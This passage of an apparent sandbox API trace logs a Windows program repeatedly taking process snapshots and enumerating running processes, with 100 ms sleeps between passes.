th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.330] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.330] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.330] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.331] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.331] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.331] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.332] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.332] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.332] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.332] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.333] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.333] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.333] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.333] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.334] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.334] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.334] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.335] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.335] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.335] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.335] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.336] Sleep (dwMilliseconds=0x64) [0224.436] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x28c [0224.437] Process32FirstW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.438] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.438] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.438] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.439] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.439] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.439] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.439] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.440] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.440] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.440] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.441] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.441] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.441] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.441] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.442] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.442] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.442] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.442] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.443] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.443] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.443] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.444] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.444] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.444] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.444] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.445] Process32NextW (in: hSnapshot=0x28c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.445] Sleep (dwMilliseconds=0x64) [0224.546] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x290 [0224.547] Process32FirstW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.548] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.548] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.548] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.548] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.549] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.549] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.549] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.550] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.550] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.550] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.550] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.551] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.551] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.551] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.551] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.552] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.552] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.552] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.553] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.553] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.553] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.553] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.554] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.554] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.554] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.555] Process32NextW (in: hSnapshot=0x290, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.555] Sleep (dwMilliseconds=0x64) [0224.654] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0224.656] Process32FirstW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.656] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.656] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.657] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.657] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.657] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.657] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, 